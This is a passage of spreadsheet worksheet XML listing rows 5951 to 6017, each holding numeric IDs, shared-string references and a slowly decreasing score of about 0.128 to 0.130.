        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="5951" ht="15.75" customHeight="1">
      <c r="A5951" s="1">
        <v>26507.0</v>
      </c>
      <c r="B5951" s="2">
        <v>1.7604198E7</v>
      </c>
      <c r="C5951" s="2" t="s">
        <v>5674</v>
      </c>
      <c r="D5951" s="2">
        <v>1.0</v>
      </c>
      <c r="E5951" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5951" s="2">
        <v>0.1300114547537228</v>
      </c>
    </row>
    <row r="5952" ht="15.75" customHeight="1">
      <c r="A5952" s="1">
        <v>21576.0</v>
      </c>
      <c r="B5952" s="2">
        <v>2.3844869E7</v>
      </c>
      <c r="C5952" s="2" t="s">
        <v>5675</v>
      </c>
      <c r="D5952" s="2">
        <v>1.0</v>
      </c>
      <c r="E5952" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5952" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="5953" ht="15.75" customHeight="1">
      <c r="A5953" s="1">
        <v>27073.0</v>
      </c>
      <c r="B5953" s="2">
        <v>2.0421752E7</v>
      </c>
      <c r="C5953" s="2" t="s">
        <v>5676</v>
      </c>
      <c r="D5953" s="2">
        <v>1.0</v>
      </c>
      <c r="E5953" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5953" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="5954" ht="15.75" customHeight="1">
      <c r="A5954" s="1">
        <v>27276.0</v>
      </c>
      <c r="B5954" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5954" s="2" t="s">
        <v>5677</v>
      </c>
      <c r="D5954" s="2">
        <v>1.0</v>
      </c>
      <c r="E5954" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5954" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="5955" ht="15.75" customHeight="1">
      <c r="A5955" s="1">
        <v>29189.0</v>
      </c>
      <c r="B5955" s="2">
        <v>3.0720045E7</v>
      </c>
      <c r="C5955" s="2" t="s">
        <v>5678</v>
      </c>
      <c r="D5955" s="2">
        <v>1.0</v>
      </c>
      <c r="E5955" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5955" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="5956" ht="15.75" customHeight="1">
      <c r="A5956" s="1">
        <v>29725.0</v>
      </c>
      <c r="B5956" s="2">
        <v>3.4549687E7</v>
      </c>
      <c r="C5956" s="2" t="s">
        <v>5679</v>
      </c>
      <c r="D5956" s="2">
        <v>1.0</v>
      </c>
      <c r="E5956" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5956" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="5957" ht="15.75" customHeight="1">
      <c r="A5957" s="1">
        <v>29077.0</v>
      </c>
      <c r="B5957" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C5957" s="2" t="s">
        <v>5680</v>
      </c>
      <c r="D5957" s="2">
        <v>1.0</v>
      </c>
      <c r="E5957" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5957" s="2">
        <v>0.1299019607843138</v>
      </c>
    </row>
    <row r="5958" ht="15.75" customHeight="1">
      <c r="A5958" s="1">
        <v>20121.0</v>
      </c>
      <c r="B5958" s="2">
        <v>6109799.0</v>
      </c>
      <c r="C5958" s="2" t="s">
        <v>5681</v>
      </c>
      <c r="D5958" s="2">
        <v>1.0</v>
      </c>
      <c r="E5958" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5958" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5959" ht="15.75" customHeight="1">
      <c r="A5959" s="1">
        <v>22893.0</v>
      </c>
      <c r="B5959" s="2">
        <v>4.7884824E7</v>
      </c>
      <c r="C5959" s="2" t="s">
        <v>5682</v>
      </c>
      <c r="D5959" s="2">
        <v>1.0</v>
      </c>
      <c r="E5959" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5959" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5960" ht="15.75" customHeight="1">
      <c r="A5960" s="1">
        <v>23075.0</v>
      </c>
      <c r="B5960" s="2">
        <v>5050645.0</v>
      </c>
      <c r="C5960" s="2" t="s">
        <v>5683</v>
      </c>
      <c r="D5960" s="2">
        <v>1.0</v>
      </c>
      <c r="E5960" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5960" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5961" ht="15.75" customHeight="1">
      <c r="A5961" s="1">
        <v>26158.0</v>
      </c>
      <c r="B5961" s="2">
        <v>1.608348E7</v>
      </c>
      <c r="C5961" s="2" t="s">
        <v>5684</v>
      </c>
      <c r="D5961" s="2">
        <v>1.0</v>
      </c>
      <c r="E5961" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5961" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5962" ht="15.75" customHeight="1">
      <c r="A5962" s="1">
        <v>29392.0</v>
      </c>
      <c r="B5962" s="2">
        <v>3.1932609E7</v>
      </c>
      <c r="C5962" s="2" t="s">
        <v>5685</v>
      </c>
      <c r="D5962" s="2">
        <v>1.0</v>
      </c>
      <c r="E5962" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5962" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5963" ht="15.75" customHeight="1">
      <c r="A5963" s="1">
        <v>29548.0</v>
      </c>
      <c r="B5963" s="2">
        <v>3.3039908E7</v>
      </c>
      <c r="C5963" s="2" t="s">
        <v>5686</v>
      </c>
      <c r="D5963" s="2">
        <v>1.0</v>
      </c>
      <c r="E5963" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5963" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5964" ht="15.75" customHeight="1">
      <c r="A5964" s="1">
        <v>30113.0</v>
      </c>
      <c r="B5964" s="2">
        <v>3.6789742E7</v>
      </c>
      <c r="C5964" s="2" t="s">
        <v>5687</v>
      </c>
      <c r="D5964" s="2">
        <v>1.0</v>
      </c>
      <c r="E5964" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5964" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5965" ht="15.75" customHeight="1">
      <c r="A5965" s="1">
        <v>30684.0</v>
      </c>
      <c r="B5965" s="2">
        <v>4.2493426E7</v>
      </c>
      <c r="C5965" s="2" t="s">
        <v>5688</v>
      </c>
      <c r="D5965" s="2">
        <v>1.0</v>
      </c>
      <c r="E5965" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5965" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5966" ht="15.75" customHeight="1">
      <c r="A5966" s="1">
        <v>32797.0</v>
      </c>
      <c r="B5966" s="2">
        <v>6150176.0</v>
      </c>
      <c r="C5966" s="2" t="s">
        <v>5689</v>
      </c>
      <c r="D5966" s="2">
        <v>1.0</v>
      </c>
      <c r="E5966" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5966" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="5967" ht="15.75" customHeight="1">
      <c r="A5967" s="1">
        <v>25175.0</v>
      </c>
      <c r="B5967" s="2">
        <v>1.3116369E7</v>
      </c>
      <c r="C5967" s="2" t="s">
        <v>5690</v>
      </c>
      <c r="D5967" s="2">
        <v>1.0</v>
      </c>
      <c r="E5967" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5967" s="2">
        <v>0.1296296296296296</v>
      </c>
    </row>
    <row r="5968" ht="15.75" customHeight="1">
      <c r="A5968" s="1">
        <v>32034.0</v>
      </c>
      <c r="B5968" s="2">
        <v>5362146.0</v>
      </c>
      <c r="C5968" s="2" t="s">
        <v>5569</v>
      </c>
      <c r="D5968" s="2">
        <v>1.0</v>
      </c>
      <c r="E5968" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5968" s="2">
        <v>0.1296296296296296</v>
      </c>
    </row>
    <row r="5969" ht="15.75" customHeight="1">
      <c r="A5969" s="1">
        <v>21504.0</v>
      </c>
      <c r="B5969" s="2">
        <v>2.3128342E7</v>
      </c>
      <c r="C5969" s="2" t="s">
        <v>5691</v>
      </c>
      <c r="D5969" s="2">
        <v>1.0</v>
      </c>
      <c r="E5969" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5969" s="2">
        <v>0.1293650793650794</v>
      </c>
    </row>
    <row r="5970" ht="15.75" customHeight="1">
      <c r="A5970" s="1">
        <v>26305.0</v>
      </c>
      <c r="B5970" s="2">
        <v>1.6612948E7</v>
      </c>
      <c r="C5970" s="2" t="s">
        <v>686</v>
      </c>
      <c r="D5970" s="2">
        <v>1.0</v>
      </c>
      <c r="E5970" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5970" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="5971" ht="15.75" customHeight="1">
      <c r="A5971" s="1">
        <v>28509.0</v>
      </c>
      <c r="B5971" s="2">
        <v>2.673415E7</v>
      </c>
      <c r="C5971" s="2" t="s">
        <v>686</v>
      </c>
      <c r="D5971" s="2">
        <v>1.0</v>
      </c>
      <c r="E5971" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5971" s="2">
        <v>0.1293402777777778</v>
      </c>
    </row>
    <row r="5972" ht="15.75" customHeight="1">
      <c r="A5972" s="1">
        <v>23626.0</v>
      </c>
      <c r="B5972" s="2">
        <v>6546494.0</v>
      </c>
      <c r="C5972" s="2" t="s">
        <v>5692</v>
      </c>
      <c r="D5972" s="2">
        <v>1.0</v>
      </c>
      <c r="E5972" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5972" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="5973" ht="15.75" customHeight="1">
      <c r="A5973" s="1">
        <v>24517.0</v>
      </c>
      <c r="B5973" s="2">
        <v>1.1158689E7</v>
      </c>
      <c r="C5973" s="2" t="s">
        <v>5627</v>
      </c>
      <c r="D5973" s="2">
        <v>1.0</v>
      </c>
      <c r="E5973" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5973" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="5974" ht="15.75" customHeight="1">
      <c r="A5974" s="1">
        <v>26692.0</v>
      </c>
      <c r="B5974" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C5974" s="2" t="s">
        <v>5693</v>
      </c>
      <c r="D5974" s="2">
        <v>1.0</v>
      </c>
      <c r="E5974" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5974" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="5975" ht="15.75" customHeight="1">
      <c r="A5975" s="1">
        <v>31945.0</v>
      </c>
      <c r="B5975" s="2">
        <v>5.3098272E7</v>
      </c>
      <c r="C5975" s="2" t="s">
        <v>5694</v>
      </c>
      <c r="D5975" s="2">
        <v>1.0</v>
      </c>
      <c r="E5975" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5975" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="5976" ht="15.75" customHeight="1">
      <c r="A5976" s="1">
        <v>33435.0</v>
      </c>
      <c r="B5976" s="2">
        <v>7811972.0</v>
      </c>
      <c r="C5976" s="2" t="s">
        <v>5695</v>
      </c>
      <c r="D5976" s="2">
        <v>1.0</v>
      </c>
      <c r="E5976" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5976" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="5977" ht="15.75" customHeight="1">
      <c r="A5977" s="1">
        <v>24844.0</v>
      </c>
      <c r="B5977" s="2">
        <v>1.2186737E7</v>
      </c>
      <c r="C5977" s="2" t="s">
        <v>5696</v>
      </c>
      <c r="D5977" s="2">
        <v>1.0</v>
      </c>
      <c r="E5977" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5977" s="2">
        <v>0.1290598290598291</v>
      </c>
    </row>
    <row r="5978" ht="15.75" customHeight="1">
      <c r="A5978" s="1">
        <v>31551.0</v>
      </c>
      <c r="B5978" s="2">
        <v>5114526.0</v>
      </c>
      <c r="C5978" s="2" t="s">
        <v>5697</v>
      </c>
      <c r="D5978" s="2">
        <v>1.0</v>
      </c>
      <c r="E5978" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5978" s="2">
        <v>0.1290598290598291</v>
      </c>
    </row>
    <row r="5979" ht="15.75" customHeight="1">
      <c r="A5979" s="1">
        <v>22678.0</v>
      </c>
      <c r="B5979" s="2">
        <v>4180034.0</v>
      </c>
      <c r="C5979" s="2" t="s">
        <v>5698</v>
      </c>
      <c r="D5979" s="2">
        <v>1.0</v>
      </c>
      <c r="E5979" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5979" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="5980" ht="15.75" customHeight="1">
      <c r="A5980" s="1">
        <v>28732.0</v>
      </c>
      <c r="B5980" s="2">
        <v>2.7984406E7</v>
      </c>
      <c r="C5980" s="2" t="s">
        <v>5699</v>
      </c>
      <c r="D5980" s="2">
        <v>1.0</v>
      </c>
      <c r="E5980" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5980" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="5981" ht="15.75" customHeight="1">
      <c r="A5981" s="1">
        <v>32947.0</v>
      </c>
      <c r="B5981" s="2">
        <v>6473431.0</v>
      </c>
      <c r="C5981" s="2" t="s">
        <v>5700</v>
      </c>
      <c r="D5981" s="2">
        <v>1.0</v>
      </c>
      <c r="E5981" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5981" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="5982" ht="15.75" customHeight="1">
      <c r="A5982" s="1">
        <v>26928.0</v>
      </c>
      <c r="B5982" s="2">
        <v>1.9468567E7</v>
      </c>
      <c r="C5982" s="2" t="s">
        <v>5701</v>
      </c>
      <c r="D5982" s="2">
        <v>1.0</v>
      </c>
      <c r="E5982" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5982" s="2">
        <v>0.1288580246913581</v>
      </c>
    </row>
    <row r="5983" ht="15.75" customHeight="1">
      <c r="A5983" s="1">
        <v>26664.0</v>
      </c>
      <c r="B5983" s="2">
        <v>1.8062124E7</v>
      </c>
      <c r="C5983" s="2" t="s">
        <v>5651</v>
      </c>
      <c r="D5983" s="2">
        <v>1.0</v>
      </c>
      <c r="E5983" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5983" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="5984" ht="15.75" customHeight="1">
      <c r="A5984" s="1">
        <v>33347.0</v>
      </c>
      <c r="B5984" s="2">
        <v>7601828.0</v>
      </c>
      <c r="C5984" s="2" t="s">
        <v>5702</v>
      </c>
      <c r="D5984" s="2">
        <v>1.0</v>
      </c>
      <c r="E5984" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5984" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="5985" ht="15.75" customHeight="1">
      <c r="A5985" s="1">
        <v>22487.0</v>
      </c>
      <c r="B5985" s="2">
        <v>3.7036161E7</v>
      </c>
      <c r="C5985" s="2" t="s">
        <v>5703</v>
      </c>
      <c r="D5985" s="2">
        <v>1.0</v>
      </c>
      <c r="E5985" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5985" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="5986" ht="15.75" customHeight="1">
      <c r="A5986" s="1">
        <v>30575.0</v>
      </c>
      <c r="B5986" s="2">
        <v>4.1083439E7</v>
      </c>
      <c r="C5986" s="2" t="s">
        <v>5704</v>
      </c>
      <c r="D5986" s="2">
        <v>1.0</v>
      </c>
      <c r="E5986" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5986" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="5987" ht="15.75" customHeight="1">
      <c r="A5987" s="1">
        <v>26492.0</v>
      </c>
      <c r="B5987" s="2">
        <v>1.7515793E7</v>
      </c>
      <c r="C5987" s="2" t="s">
        <v>5705</v>
      </c>
      <c r="D5987" s="2">
        <v>1.0</v>
      </c>
      <c r="E5987" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5987" s="2">
        <v>0.1284722222222223</v>
      </c>
    </row>
    <row r="5988" ht="15.75" customHeight="1">
      <c r="A5988" s="1">
        <v>19882.0</v>
      </c>
      <c r="B5988" s="2">
        <v>5.7256677E7</v>
      </c>
      <c r="C5988" s="2" t="s">
        <v>5706</v>
      </c>
      <c r="D5988" s="2">
        <v>1.0</v>
      </c>
      <c r="E5988" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5988" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="5989" ht="15.75" customHeight="1">
      <c r="A5989" s="1">
        <v>22647.0</v>
      </c>
      <c r="B5989" s="2">
        <v>4.0887575E7</v>
      </c>
      <c r="C5989" s="2" t="s">
        <v>5707</v>
      </c>
      <c r="D5989" s="2">
        <v>1.0</v>
      </c>
      <c r="E5989" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5989" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="5990" ht="15.75" customHeight="1">
      <c r="A5990" s="1">
        <v>32740.0</v>
      </c>
      <c r="B5990" s="2">
        <v>6026866.0</v>
      </c>
      <c r="C5990" s="2" t="s">
        <v>5708</v>
      </c>
      <c r="D5990" s="2">
        <v>1.0</v>
      </c>
      <c r="E5990" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5990" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="5991" ht="15.75" customHeight="1">
      <c r="A5991" s="1">
        <v>28651.0</v>
      </c>
      <c r="B5991" s="2">
        <v>2.7346574E7</v>
      </c>
      <c r="C5991" s="2" t="s">
        <v>5709</v>
      </c>
      <c r="D5991" s="2">
        <v>1.0</v>
      </c>
      <c r="E5991" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5991" s="2">
        <v>0.1283783783783784</v>
      </c>
    </row>
    <row r="5992" ht="15.75" customHeight="1">
      <c r="A5992" s="1">
        <v>9383.0</v>
      </c>
      <c r="B5992" s="2">
        <v>5.5742295E7</v>
      </c>
      <c r="C5992" s="2" t="s">
        <v>5710</v>
      </c>
      <c r="D5992" s="2">
        <v>1.0</v>
      </c>
      <c r="E5992" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5992" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="5993" ht="15.75" customHeight="1">
      <c r="A5993" s="1">
        <v>25317.0</v>
      </c>
      <c r="B5993" s="2">
        <v>1.3433227E7</v>
      </c>
      <c r="C5993" s="2" t="s">
        <v>5672</v>
      </c>
      <c r="D5993" s="2">
        <v>1.0</v>
      </c>
      <c r="E5993" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5993" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="5994" ht="15.75" customHeight="1">
      <c r="A5994" s="1">
        <v>25458.0</v>
      </c>
      <c r="B5994" s="2">
        <v>1.3966133E7</v>
      </c>
      <c r="C5994" s="2" t="s">
        <v>5711</v>
      </c>
      <c r="D5994" s="2">
        <v>1.0</v>
      </c>
      <c r="E5994" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5994" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="5995" ht="15.75" customHeight="1">
      <c r="A5995" s="1">
        <v>28999.0</v>
      </c>
      <c r="B5995" s="2">
        <v>2.9866534E7</v>
      </c>
      <c r="C5995" s="2" t="s">
        <v>5712</v>
      </c>
      <c r="D5995" s="2">
        <v>1.0</v>
      </c>
      <c r="E5995" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5995" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="5996" ht="15.75" customHeight="1">
      <c r="A5996" s="1">
        <v>30695.0</v>
      </c>
      <c r="B5996" s="2">
        <v>4254876.0</v>
      </c>
      <c r="C5996" s="2" t="s">
        <v>5713</v>
      </c>
      <c r="D5996" s="2">
        <v>1.0</v>
      </c>
      <c r="E5996" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5996" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="5997" ht="15.75" customHeight="1">
      <c r="A5997" s="1">
        <v>28333.0</v>
      </c>
      <c r="B5997" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C5997" s="2" t="s">
        <v>5714</v>
      </c>
      <c r="D5997" s="2">
        <v>1.0</v>
      </c>
      <c r="E5997" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5997" s="2">
        <v>0.1281481481481482</v>
      </c>
    </row>
    <row r="5998" ht="15.75" customHeight="1">
      <c r="A5998" s="1">
        <v>19657.0</v>
      </c>
      <c r="B5998" s="2">
        <v>5.6346981E7</v>
      </c>
      <c r="C5998" s="2" t="s">
        <v>5715</v>
      </c>
      <c r="D5998" s="2">
        <v>1.0</v>
      </c>
      <c r="E5998" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5998" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="5999" ht="15.75" customHeight="1">
      <c r="A5999" s="1">
        <v>22084.0</v>
      </c>
      <c r="B5999" s="2">
        <v>3.0720046E7</v>
      </c>
      <c r="C5999" s="2" t="s">
        <v>5678</v>
      </c>
      <c r="D5999" s="2">
        <v>1.0</v>
      </c>
      <c r="E5999" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5999" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="6000" ht="15.75" customHeight="1">
      <c r="A6000" s="1">
        <v>26954.0</v>
      </c>
      <c r="B6000" s="2">
        <v>1.961731E7</v>
      </c>
      <c r="C6000" s="2" t="s">
        <v>5716</v>
      </c>
      <c r="D6000" s="2">
        <v>1.0</v>
      </c>
      <c r="E6000" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6000" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="6001" ht="15.75" customHeight="1">
      <c r="A6001" s="1">
        <v>13410.0</v>
      </c>
      <c r="B6001" s="2">
        <v>3.500363E7</v>
      </c>
      <c r="C6001" s="2" t="s">
        <v>5717</v>
      </c>
      <c r="D6001" s="2">
        <v>1.0</v>
      </c>
      <c r="E6001" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6001" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6002" ht="15.75" customHeight="1">
      <c r="A6002" s="1">
        <v>15011.0</v>
      </c>
      <c r="B6002" s="2">
        <v>4.1475557E7</v>
      </c>
      <c r="C6002" s="2" t="s">
        <v>5718</v>
      </c>
      <c r="D6002" s="2">
        <v>1.0</v>
      </c>
      <c r="E6002" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6002" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6003" ht="15.75" customHeight="1">
      <c r="A6003" s="1">
        <v>20981.0</v>
      </c>
      <c r="B6003" s="2">
        <v>1.6979215E7</v>
      </c>
      <c r="C6003" s="2" t="s">
        <v>5719</v>
      </c>
      <c r="D6003" s="2">
        <v>1.0</v>
      </c>
      <c r="E6003" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6003" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6004" ht="15.75" customHeight="1">
      <c r="A6004" s="1">
        <v>20983.0</v>
      </c>
      <c r="B6004" s="2">
        <v>1.6981532E7</v>
      </c>
      <c r="C6004" s="2" t="s">
        <v>5720</v>
      </c>
      <c r="D6004" s="2">
        <v>1.0</v>
      </c>
      <c r="E6004" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6004" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6005" ht="15.75" customHeight="1">
      <c r="A6005" s="1">
        <v>21129.0</v>
      </c>
      <c r="B6005" s="2">
        <v>1.8379345E7</v>
      </c>
      <c r="C6005" s="2" t="s">
        <v>5721</v>
      </c>
      <c r="D6005" s="2">
        <v>1.0</v>
      </c>
      <c r="E6005" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6005" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6006" ht="15.75" customHeight="1">
      <c r="A6006" s="1">
        <v>21572.0</v>
      </c>
      <c r="B6006" s="2">
        <v>2.3792889E7</v>
      </c>
      <c r="C6006" s="2" t="s">
        <v>5722</v>
      </c>
      <c r="D6006" s="2">
        <v>1.0</v>
      </c>
      <c r="E6006" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6006" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6007" ht="15.75" customHeight="1">
      <c r="A6007" s="1">
        <v>21723.0</v>
      </c>
      <c r="B6007" s="2">
        <v>2.5604603E7</v>
      </c>
      <c r="C6007" s="2" t="s">
        <v>5723</v>
      </c>
      <c r="D6007" s="2">
        <v>1.0</v>
      </c>
      <c r="E6007" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6007" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6008" ht="15.75" customHeight="1">
      <c r="A6008" s="1">
        <v>22059.0</v>
      </c>
      <c r="B6008" s="2">
        <v>3.0511052E7</v>
      </c>
      <c r="C6008" s="2" t="s">
        <v>5724</v>
      </c>
      <c r="D6008" s="2">
        <v>1.0</v>
      </c>
      <c r="E6008" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6008" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6009" ht="15.75" customHeight="1">
      <c r="A6009" s="1">
        <v>22406.0</v>
      </c>
      <c r="B6009" s="2">
        <v>3.5719956E7</v>
      </c>
      <c r="C6009" s="2" t="s">
        <v>5725</v>
      </c>
      <c r="D6009" s="2">
        <v>1.0</v>
      </c>
      <c r="E6009" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6009" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6010" ht="15.75" customHeight="1">
      <c r="A6010" s="1">
        <v>22627.0</v>
      </c>
      <c r="B6010" s="2">
        <v>4.0435799E7</v>
      </c>
      <c r="C6010" s="2" t="s">
        <v>5726</v>
      </c>
      <c r="D6010" s="2">
        <v>1.0</v>
      </c>
      <c r="E6010" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6010" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6011" ht="15.75" customHeight="1">
      <c r="A6011" s="1">
        <v>22907.0</v>
      </c>
      <c r="B6011" s="2">
        <v>4.8165182E7</v>
      </c>
      <c r="C6011" s="2" t="s">
        <v>5727</v>
      </c>
      <c r="D6011" s="2">
        <v>1.0</v>
      </c>
      <c r="E6011" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6011" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6012" ht="15.75" customHeight="1">
      <c r="A6012" s="1">
        <v>23556.0</v>
      </c>
      <c r="B6012" s="2">
        <v>6106833.0</v>
      </c>
      <c r="C6012" s="2" t="s">
        <v>5728</v>
      </c>
      <c r="D6012" s="2">
        <v>1.0</v>
      </c>
      <c r="E6012" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6012" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6013" ht="15.75" customHeight="1">
      <c r="A6013" s="1">
        <v>23867.0</v>
      </c>
      <c r="B6013" s="2">
        <v>8340366.0</v>
      </c>
      <c r="C6013" s="2" t="s">
        <v>5729</v>
      </c>
      <c r="D6013" s="2">
        <v>1.0</v>
      </c>
      <c r="E6013" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6013" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6014" ht="15.75" customHeight="1">
      <c r="A6014" s="1">
        <v>24085.0</v>
      </c>
      <c r="B6014" s="2">
        <v>9742479.0</v>
      </c>
      <c r="C6014" s="2" t="s">
        <v>5730</v>
      </c>
      <c r="D6014" s="2">
        <v>1.0</v>
      </c>
      <c r="E6014" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6014" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6015" ht="15.75" customHeight="1">
      <c r="A6015" s="1">
        <v>24287.0</v>
      </c>
      <c r="B6015" s="2">
        <v>1.0556599E7</v>
      </c>
      <c r="C6015" s="2" t="s">
        <v>5731</v>
      </c>
      <c r="D6015" s="2">
        <v>1.0</v>
      </c>
      <c r="E6015" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6015" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6016" ht="15.75" customHeight="1">
      <c r="A6016" s="1">
        <v>24324.0</v>
      </c>
      <c r="B6016" s="2">
        <v>1.0659986E7</v>
      </c>
      <c r="C6016" s="2" t="s">
        <v>5732</v>
      </c>
      <c r="D6016" s="2">
        <v>1.0</v>
      </c>
      <c r="E6016" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6016" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="6017" ht="15.75" customHeight="1">
      <c r="A6017" s="1">
        <v>24810.0</v>
      </c>
      <c r="B6017" s="2">
        <v>1.2044782E7</v>
      </c>
      <c r="C6017" s="2" t="s">
        <v>5733</v>
      </c>
      <c r="D6017" s="2">
        <v>1.0</v>
      </c>
      <c r="E6017" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6017" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
